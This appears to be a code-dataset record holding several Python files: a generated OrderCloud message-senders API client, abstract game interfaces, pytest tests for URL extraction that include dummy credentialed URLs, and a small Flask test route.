0
| 7
|
f4e5385b45669fe912257fc0b46b9a6bc23be3bf
| 35,459
|
py
|
Python
|
OrderCloud/apis/message_senders_api.py
|
klreeher/python-sdk
|
b7fe922dcfc3bb73fe4149475fa45fdcb04d956a
|
[
"Apache-2.0"
] | null | null | null |
OrderCloud/apis/message_senders_api.py
|
klreeher/python-sdk
|
b7fe922dcfc3bb73fe4149475fa45fdcb04d956a
|
[
"Apache-2.0"
] | null | null | null |
OrderCloud/apis/message_senders_api.py
|
klreeher/python-sdk
|
b7fe922dcfc3bb73fe4149475fa45fdcb04d956a
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
OrderCloud
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 1.0
Contact: ordercloud@four51.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class MessageSendersApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
    """Create the API wrapper.

    :param api_client: optional pre-built ApiClient; when omitted the
        shared client held by the global Configuration is used (and
        created lazily on first use).
    """
    configuration = Configuration()
    if api_client:
        self.api_client = api_client
        return
    # Lazily attach a default client to the shared configuration so all
    # API classes without an explicit client reuse the same instance.
    if not configuration.api_client:
        configuration.api_client = ApiClient()
    self.api_client = configuration.api_client
def messagesenders_assignments_get(self, **kwargs):
    """List message sender assignments.

    Synchronous by default; pass a `callback` keyword to make the call
    asynchronous — the request thread is returned and the callback
    receives the response.

    :param callback function: invoked with the response (optional)
    :param str buyer_id: ID of the buyer.
    :param str message_sender_id: ID of the message sender.
    :param str user_id: ID of the user.
    :param str user_group_id: ID of the user group.
    :param str level: Level of the message sender.
    :param int page: Page of the message sender.
    :param int page_size: Page size of the message sender.
    :return: ListMessageSenderAssignment, or the request thread when
        called asynchronously.
    """
    # Ask the low-level call for the deserialized body only, not the
    # (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        return self.messagesenders_assignments_get_with_http_info(**kwargs)
    response = self.messagesenders_assignments_get_with_http_info(**kwargs)
    return response
def messagesenders_assignments_get_with_http_info(self, **kwargs):
    """
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>> pprint(response)
    >>>
    >>> thread = api.messagesenders_assignments_get_with_http_info(callback=callback_function)
    :param callback function: The callback function
    for asynchronous request. (optional)
    :param str buyer_id: ID of the buyer.
    :param str message_sender_id: ID of the message sender.
    :param str user_id: ID of the user.
    :param str user_group_id: ID of the user group.
    :param str level: Level of the message sender.
    :param int page: Page of the message sender.
    :param int page_size: Page size of the message sender.
    :return: ListMessageSenderAssignment
    If the method is called asynchronously,
    returns the request thread.
    """
    # Whitelist of keyword arguments accepted by this endpoint.
    all_params = ['buyer_id', 'message_sender_id', 'user_id', 'user_group_id', 'level', 'page', 'page_size']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # NOTE: generated code captures locals() here (self/kwargs/all_params)
    # and folds the validated kwargs into it — do not rename locals above
    # this line, and do not add locals that collide with parameter names.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method messagesenders_assignments_get" % key
            )
        params[key] = val
    del params['kwargs']

    resource_path = '/messagesenders/assignments'.replace('{format}', 'json')
    path_params = {}

    # Map snake_case keyword arguments onto the wire-format query names.
    query_params = {}
    if 'buyer_id' in params:
        query_params['buyerID'] = params['buyer_id']
    if 'message_sender_id' in params:
        query_params['messageSenderID'] = params['message_sender_id']
    if 'user_id' in params:
        query_params['userID'] = params['user_id']
    if 'user_group_id' in params:
        query_params['userGroupID'] = params['user_group_id']
    if 'level' in params:
        query_params['level'] = params['level']
    if 'page' in params:
        query_params['page'] = params['page']
    if 'page_size' in params:
        query_params['pageSize'] = params['page_size']

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept` — dropped entirely when the client negotiates none.
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'text/plain; charset=utf-8'])

    # Authentication setting
    auth_settings = ['oauth2']

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='ListMessageSenderAssignment',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def messagesenders_assignments_post(self, assignment, **kwargs):
    """Create or update a message sender assignment.

    Synchronous by default; pass a `callback` keyword to make the call
    asynchronous — the request thread is returned and the callback
    receives the response.

    :param MessageSenderAssignment assignment: (required)
    :param callback function: invoked with the response (optional)
    :return: None, or the request thread when called asynchronously.
    """
    # Only the deserialized body is wanted, not (data, status, headers).
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        return self.messagesenders_assignments_post_with_http_info(assignment, **kwargs)
    response = self.messagesenders_assignments_post_with_http_info(assignment, **kwargs)
    return response
def messagesenders_assignments_post_with_http_info(self, assignment, **kwargs):
    """
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>> pprint(response)
    >>>
    >>> thread = api.messagesenders_assignments_post_with_http_info(assignment, callback=callback_function)
    :param callback function: The callback function
    for asynchronous request. (optional)
    :param MessageSenderAssignment assignment: (required)
    :return: None
    If the method is called asynchronously,
    returns the request thread.
    """
    # Whitelist of keyword arguments accepted by this endpoint.
    all_params = ['assignment']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # NOTE: generated code captures locals() here and folds the validated
    # kwargs into it — do not rename locals above this line.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method messagesenders_assignments_post" % key
            )
        params[key] = val
    del params['kwargs']

    # verify the required parameter 'assignment' is set
    if ('assignment' not in params) or (params['assignment'] is None):
        raise ValueError("Missing the required parameter `assignment` when calling `messagesenders_assignments_post`")

    resource_path = '/messagesenders/assignments'.replace('{format}', 'json')
    path_params = {}
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}

    # The assignment object is serialized as the request body.
    body_params = None
    if 'assignment' in params:
        body_params = params['assignment']

    # HTTP header `Accept` — dropped entirely when the client negotiates none.
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'text/plain; charset=utf-8'])

    # Authentication setting
    auth_settings = ['oauth2']

    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type=None,
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def messagesenders_cc_listener_assignments_get(self, **kwargs):
    """List message CC listener assignments.

    Synchronous by default; pass a `callback` keyword to make the call
    asynchronous — the request thread is returned and the callback
    receives the response.

    :param callback function: invoked with the response (optional)
    :param str search: Search of the message sender.
    :param list[str] search_on: Search on of the message sender.
    :param list[str] sort_by: Sort by of the message sender.
    :param int page: Page of the message sender.
    :param int page_size: Page size of the message sender.
    :return: ListMessageCCListenerAssignment, or the request thread when
        called asynchronously.
    """
    # Ask the low-level call for the deserialized body only.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        return self.messagesenders_cc_listener_assignments_get_with_http_info(**kwargs)
    response = self.messagesenders_cc_listener_assignments_get_with_http_info(**kwargs)
    return response
def messagesenders_cc_listener_assignments_get_with_http_info(self, **kwargs):
    """
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>> pprint(response)
    >>>
    >>> thread = api.messagesenders_cc_listener_assignments_get_with_http_info(callback=callback_function)
    :param callback function: The callback function
    for asynchronous request. (optional)
    :param str search: Search of the message sender.
    :param list[str] search_on: Search on of the message sender.
    :param list[str] sort_by: Sort by of the message sender.
    :param int page: Page of the message sender.
    :param int page_size: Page size of the message sender.
    :return: ListMessageCCListenerAssignment
    If the method is called asynchronously,
    returns the request thread.
    """
    # Whitelist of keyword arguments accepted by this endpoint.
    all_params = ['search', 'search_on', 'sort_by', 'page', 'page_size']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # NOTE: generated code captures locals() here and folds the validated
    # kwargs into it — do not rename locals above this line.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method messagesenders_cc_listener_assignments_get" % key
            )
        params[key] = val
    del params['kwargs']

    resource_path = '/messagesenders/CCListenerAssignments'.replace('{format}', 'json')
    path_params = {}

    # Map snake_case keyword arguments onto the wire-format query names.
    query_params = {}
    if 'search' in params:
        query_params['search'] = params['search']
    if 'search_on' in params:
        query_params['searchOn'] = params['search_on']
    if 'sort_by' in params:
        query_params['sortBy'] = params['sort_by']
    if 'page' in params:
        query_params['page'] = params['page']
    if 'page_size' in params:
        query_params['pageSize'] = params['page_size']

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept` — dropped entirely when the client negotiates none.
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'text/plain; charset=utf-8'])

    # Authentication setting
    auth_settings = ['oauth2']

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='ListMessageCCListenerAssignment',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def messagesenders_cc_listener_assignments_post(self, assignment, **kwargs):
    """Create or update a message CC listener assignment.

    Synchronous by default; pass a `callback` keyword to make the call
    asynchronous — the request thread is returned and the callback
    receives the response.

    :param MessageCCListenerAssignment assignment: (required)
    :param callback function: invoked with the response (optional)
    :return: None, or the request thread when called asynchronously.
    """
    # Only the deserialized body is wanted, not (data, status, headers).
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        return self.messagesenders_cc_listener_assignments_post_with_http_info(assignment, **kwargs)
    response = self.messagesenders_cc_listener_assignments_post_with_http_info(assignment, **kwargs)
    return response
def messagesenders_cc_listener_assignments_post_with_http_info(self, assignment, **kwargs):
    """
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>> pprint(response)
    >>>
    >>> thread = api.messagesenders_cc_listener_assignments_post_with_http_info(assignment, callback=callback_function)
    :param callback function: The callback function
    for asynchronous request. (optional)
    :param MessageCCListenerAssignment assignment: (required)
    :return: None
    If the method is called asynchronously,
    returns the request thread.
    """
    # Whitelist of keyword arguments accepted by this endpoint.
    all_params = ['assignment']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # NOTE: generated code captures locals() here and folds the validated
    # kwargs into it — do not rename locals above this line.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method messagesenders_cc_listener_assignments_post" % key
            )
        params[key] = val
    del params['kwargs']

    # verify the required parameter 'assignment' is set
    if ('assignment' not in params) or (params['assignment'] is None):
        raise ValueError("Missing the required parameter `assignment` when calling `messagesenders_cc_listener_assignments_post`")

    resource_path = '/messagesenders/CCListenerAssignments'.replace('{format}', 'json')
    path_params = {}
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}

    # The assignment object is serialized as the request body.
    body_params = None
    if 'assignment' in params:
        body_params = params['assignment']

    # HTTP header `Accept` — dropped entirely when the client negotiates none.
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'text/plain; charset=utf-8'])

    # Authentication setting
    auth_settings = ['oauth2']

    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type=None,
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def messagesenders_get(self, **kwargs):
    """List message senders.

    Synchronous by default; pass a `callback` keyword to make the call
    asynchronous — the request thread is returned and the callback
    receives the response.

    :param callback function: invoked with the response (optional)
    :param str search: Search of the message sender.
    :param list[str] search_on: Search on of the message sender.
    :param list[str] sort_by: Sort by of the message sender.
    :param int page: Page of the message sender.
    :param int page_size: Page size of the message sender.
    :return: ListMessageSender, or the request thread when called
        asynchronously.
    """
    # Ask the low-level call for the deserialized body only.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        return self.messagesenders_get_with_http_info(**kwargs)
    response = self.messagesenders_get_with_http_info(**kwargs)
    return response
def messagesenders_get_with_http_info(self, **kwargs):
    """
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>> pprint(response)
    >>>
    >>> thread = api.messagesenders_get_with_http_info(callback=callback_function)
    :param callback function: The callback function
    for asynchronous request. (optional)
    :param str search: Search of the message sender.
    :param list[str] search_on: Search on of the message sender.
    :param list[str] sort_by: Sort by of the message sender.
    :param int page: Page of the message sender.
    :param int page_size: Page size of the message sender.
    :return: ListMessageSender
    If the method is called asynchronously,
    returns the request thread.
    """
    # Whitelist of keyword arguments accepted by this endpoint.
    all_params = ['search', 'search_on', 'sort_by', 'page', 'page_size']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # NOTE: generated code captures locals() here and folds the validated
    # kwargs into it — do not rename locals above this line.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method messagesenders_get" % key
            )
        params[key] = val
    del params['kwargs']

    resource_path = '/messagesenders'.replace('{format}', 'json')
    path_params = {}

    # Map snake_case keyword arguments onto the wire-format query names.
    query_params = {}
    if 'search' in params:
        query_params['search'] = params['search']
    if 'search_on' in params:
        query_params['searchOn'] = params['search_on']
    if 'sort_by' in params:
        query_params['sortBy'] = params['sort_by']
    if 'page' in params:
        query_params['page'] = params['page']
    if 'page_size' in params:
        query_params['pageSize'] = params['page_size']

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept` — dropped entirely when the client negotiates none.
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'text/plain; charset=utf-8'])

    # Authentication setting
    auth_settings = ['oauth2']

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='ListMessageSender',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def messagesenders_message_sender_id_assignments_delete(self, message_sender_id, **kwargs):
    """Delete a message sender assignment.

    Synchronous by default; pass a `callback` keyword to make the call
    asynchronous — the request thread is returned and the callback
    receives the response.

    :param str message_sender_id: ID of the message sender. (required)
    :param callback function: invoked with the response (optional)
    :param str buyer_id: ID of the buyer.
    :param str user_id: ID of the user.
    :param str user_group_id: ID of the user group.
    :return: None, or the request thread when called asynchronously.
    """
    # Only the deserialized body is wanted, not (data, status, headers).
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        return self.messagesenders_message_sender_id_assignments_delete_with_http_info(message_sender_id, **kwargs)
    response = self.messagesenders_message_sender_id_assignments_delete_with_http_info(message_sender_id, **kwargs)
    return response
def messagesenders_message_sender_id_assignments_delete_with_http_info(self, message_sender_id, **kwargs):
    """
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>> pprint(response)
    >>>
    >>> thread = api.messagesenders_message_sender_id_assignments_delete_with_http_info(message_sender_id, callback=callback_function)
    :param callback function: The callback function
    for asynchronous request. (optional)
    :param str message_sender_id: ID of the message sender. (required)
    :param str buyer_id: ID of the buyer.
    :param str user_id: ID of the user.
    :param str user_group_id: ID of the user group.
    :return: None
    If the method is called asynchronously,
    returns the request thread.
    """
    # Whitelist of keyword arguments accepted by this endpoint.
    all_params = ['message_sender_id', 'buyer_id', 'user_id', 'user_group_id']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # NOTE: generated code captures locals() here and folds the validated
    # kwargs into it — do not rename locals above this line.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method messagesenders_message_sender_id_assignments_delete" % key
            )
        params[key] = val
    del params['kwargs']

    # verify the required parameter 'message_sender_id' is set
    if ('message_sender_id' not in params) or (params['message_sender_id'] is None):
        raise ValueError("Missing the required parameter `message_sender_id` when calling `messagesenders_message_sender_id_assignments_delete`")

    # The message sender ID is interpolated into the URL path.
    resource_path = '/messagesenders/{messageSenderID}/assignments'.replace('{format}', 'json')
    path_params = {}
    if 'message_sender_id' in params:
        path_params['messageSenderID'] = params['message_sender_id']

    # Map snake_case keyword arguments onto the wire-format query names.
    query_params = {}
    if 'buyer_id' in params:
        query_params['buyerID'] = params['buyer_id']
    if 'user_id' in params:
        query_params['userID'] = params['user_id']
    if 'user_group_id' in params:
        query_params['userGroupID'] = params['user_group_id']

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept` — dropped entirely when the client negotiates none.
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'text/plain; charset=utf-8'])

    # Authentication setting
    auth_settings = ['oauth2']

    return self.api_client.call_api(resource_path, 'DELETE',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type=None,
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def messagesenders_message_sender_id_get(self, message_sender_id, **kwargs):
    """Fetch a single message sender by ID.

    Synchronous by default; pass a `callback` keyword to make the call
    asynchronous — the request thread is returned and the callback
    receives the response.

    :param str message_sender_id: ID of the message sender. (required)
    :param callback function: invoked with the response (optional)
    :return: MessageSender, or the request thread when called
        asynchronously.
    """
    # Ask the low-level call for the deserialized body only.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        return self.messagesenders_message_sender_id_get_with_http_info(message_sender_id, **kwargs)
    response = self.messagesenders_message_sender_id_get_with_http_info(message_sender_id, **kwargs)
    return response
def messagesenders_message_sender_id_get_with_http_info(self, message_sender_id, **kwargs):
    """
    Retrieve a single message sender by its ID (full HTTP info variant).

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.messagesenders_message_sender_id_get_with_http_info(message_sender_id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str message_sender_id: ID of the message sender. (required)
    :return: MessageSender
        If the method is called asynchronously,
        returns the request thread.
    """
    # Whitelist of keyword arguments this endpoint accepts; anything else
    # is rejected with a TypeError below.
    all_params = ['message_sender_id']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    # `params` deliberately captures the current locals (including
    # `message_sender_id`) — do not rename locals above this line.
    params = locals()
    # NOTE(review): `iteritems` is presumably imported from six at the top
    # of this module (not visible in this chunk) — verify.
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method messagesenders_message_sender_id_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'message_sender_id' is set
    if ('message_sender_id' not in params) or (params['message_sender_id'] is None):
        raise ValueError("Missing the required parameter `message_sender_id` when calling `messagesenders_message_sender_id_get`")
    resource_path = '/messagesenders/{messageSenderID}'.replace('{format}', 'json')
    path_params = {}
    if 'message_sender_id' in params:
        path_params['messageSenderID'] = params['message_sender_id']
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    # GET request: no body is sent.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
    # Authentication setting
    auth_settings = ['oauth2']
    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='MessageSender',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
| 42.213095
| 150
| 0.569052
| 3,574
| 35,459
| 5.409065
| 0.062955
| 0.055814
| 0.039572
| 0.029795
| 0.937668
| 0.932702
| 0.925098
| 0.918322
| 0.916977
| 0.911184
| 0
| 0.00109
| 0.353056
| 35,459
| 839
| 151
| 42.263409
| 0.84163
| 0.329564
| 0
| 0.806202
| 1
| 0
| 0.180579
| 0.054712
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03876
| false
| 0
| 0.018088
| 0
| 0.113695
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f4f811fb80e9dddeac80bc93ebaf006eb62d6539
| 190
|
py
|
Python
|
model/components/interfaces.py
|
MattJTrueblood/Allies_RL_Prototype
|
1c7c4360156d0dc5ff53c49401d25026761862df
|
[
"Unlicense"
] | 1
|
2018-11-19T19:51:49.000Z
|
2018-11-19T19:51:49.000Z
|
model/components/interfaces.py
|
MattJTrueblood/Allies_RL_Prototype
|
1c7c4360156d0dc5ff53c49401d25026761862df
|
[
"Unlicense"
] | null | null | null |
model/components/interfaces.py
|
MattJTrueblood/Allies_RL_Prototype
|
1c7c4360156d0dc5ff53c49401d25026761862df
|
[
"Unlicense"
] | null | null | null |
from abc import ABC, abstractmethod
class Interactive(ABC):
    """Interface for objects an actor can trigger an interaction on."""

    @abstractmethod
    def interact(self, actor):
        """Carry out this object's interaction, initiated by ``actor``."""
class UpdateOnTick(ABC):
    """Interface for objects that advance their state once per game tick."""

    @abstractmethod
    def update(self):
        """Advance this object's state by one tick."""
| 19
| 35
| 0.726316
| 22
| 190
| 6.272727
| 0.590909
| 0.369565
| 0.289855
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.189474
| 190
| 9
| 36
| 21.111111
| 0.896104
| 0
| 0
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0.285714
| 0.142857
| 0
| 0.714286
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
7612c684597556f8d8d859539a8e20438160f613
| 2,284
|
py
|
Python
|
tests/test_urls.py
|
kraptor/perlink
|
bffaf9ed5bac1bbb258403b5c4b4d3f936df56f3
|
[
"MIT"
] | 2
|
2021-05-10T06:16:09.000Z
|
2021-09-07T15:24:47.000Z
|
tests/test_urls.py
|
kraptor/perlink
|
bffaf9ed5bac1bbb258403b5c4b4d3f936df56f3
|
[
"MIT"
] | null | null | null |
tests/test_urls.py
|
kraptor/perlink
|
bffaf9ed5bac1bbb258403b5c4b4d3f936df56f3
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2021 kraptor
#
# This software is released under the MIT License.
# https://opensource.org/licenses/MIT
import os
import perlink.config
import perlink.bot
def test_allow_raw_uris():
    """With raw-link detection on, both bare and explicit URLs are found."""
    config = perlink.config.load()
    config.detect_raw_links = True
    bot = perlink.bot.PerlinkBot(config)
    # (message text, URLs the bot is expected to extract)
    cases = [
        ("itch.io", ["itch.io"]),
        ("itch.io youtube.com", ["itch.io", "youtube.com"]),
        ("http://itch.io", ["http://itch.io"]),
        ("", []),
        (None, []),
    ]
    for message, expected_urls in cases:
        assert list(bot.find_urls(message)) == expected_urls
def test_only_non_raw_uris():
    """With raw-link detection off, only URLs with a scheme are found."""
    config = perlink.config.load()
    config.detect_raw_links = False
    bot = perlink.bot.PerlinkBot(config)
    # (message text, URLs the bot is expected to extract)
    cases = [
        ("itch.io", []),
        ("itch.io http://youtube.com", ["http://youtube.com"]),
        ("", []),
        (None, []),
    ]
    for message, expected_urls in cases:
        assert list(bot.find_urls(message)) == expected_urls
def test_ignore_links_with_secrets():
    """URLs carrying userinfo (user:password@) are dropped when ignoring secrets."""
    config = perlink.config.load()
    config.detect_raw_links = True
    config.ignore_links_with_secrets = True
    config.valid_link_protocols.add("http")
    bot = perlink.bot.PerlinkBot(config)
    # Every message below embeds credentials, so nothing should be extracted.
    cases = [
        ("a:a@itch.io", []),
        ("http://theuser:thepassword@example.com", []),
        ("http://:thepassword@example.com", []),
        ("http://theuser:@example.com", []),
        ("", []),
        (None, []),
    ]
    for message, expected_urls in cases:
        assert list(bot.find_urls(message)) == expected_urls
def test_keep_links_with_secrets():
    """URLs carrying userinfo are kept verbatim when not ignoring secrets."""
    config = perlink.config.load()
    config.detect_raw_links = True
    config.ignore_links_with_secrets = False
    config.valid_link_protocols.add("http")
    bot = perlink.bot.PerlinkBot(config)
    # Credentialed URLs must pass through unchanged.
    cases = [
        ("http://theuser:thepassword@example.com", ["http://theuser:thepassword@example.com"]),
        ("http://:thepassword@example.com", ["http://:thepassword@example.com"]),
        ("http://theuser:@example.com", ["http://theuser:@example.com"]),
        ("", []),
        (None, []),
    ]
    for message, expected_urls in cases:
        assert list(bot.find_urls(message)) == expected_urls
| 26.55814
| 95
| 0.590193
| 263
| 2,284
| 4.984791
| 0.231939
| 0.04119
| 0.074752
| 0.114416
| 0.800915
| 0.800915
| 0.776506
| 0.776506
| 0.776506
| 0.773455
| 0
| 0.002298
| 0.237741
| 2,284
| 85
| 96
| 26.870588
| 0.750718
| 0.049037
| 0
| 0.587302
| 0
| 0
| 0.201754
| 0
| 0
| 0
| 0
| 0
| 0.063492
| 1
| 0.063492
| false
| 0.063492
| 0.047619
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
520722ca5520021bb24fcfbe1ca90b58346d1337
| 174
|
py
|
Python
|
integration/tests/error_predicate.py
|
markus1189/hurl-dev
|
2f5bdf3519bda3155a6acc01cb442a3cb4364584
|
[
"Apache-2.0"
] | 4
|
2020-08-26T12:22:58.000Z
|
2020-09-06T22:29:18.000Z
|
integration/tests/error_predicate.py
|
markus1189/hurl-dev
|
2f5bdf3519bda3155a6acc01cb442a3cb4364584
|
[
"Apache-2.0"
] | 11
|
2021-01-07T12:22:38.000Z
|
2022-03-22T22:31:20.000Z
|
integration/tests/error_predicate.py
|
markus1189/hurl-dev
|
2f5bdf3519bda3155a6acc01cb442a3cb4364584
|
[
"Apache-2.0"
] | 10
|
2020-09-02T09:43:16.000Z
|
2022-02-11T07:50:24.000Z
|
from tests import app
@app.route("/predicate/error/type")
def predicate_error_type():
    """Serve a JSON body whose fields deliberately mix value types
    (bool, string, int, empty string, float) — presumably so integration
    tests can exercise predicate type-mismatch errors; verify against the
    Hurl test that requests this route."""
    return '{ "status": true, "message": "0", "count": 1, "empty": "", "number": 1.0 }'
| 34.8
| 87
| 0.632184
| 24
| 174
| 4.5
| 0.75
| 0.259259
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.026667
| 0.137931
| 174
| 5
| 87
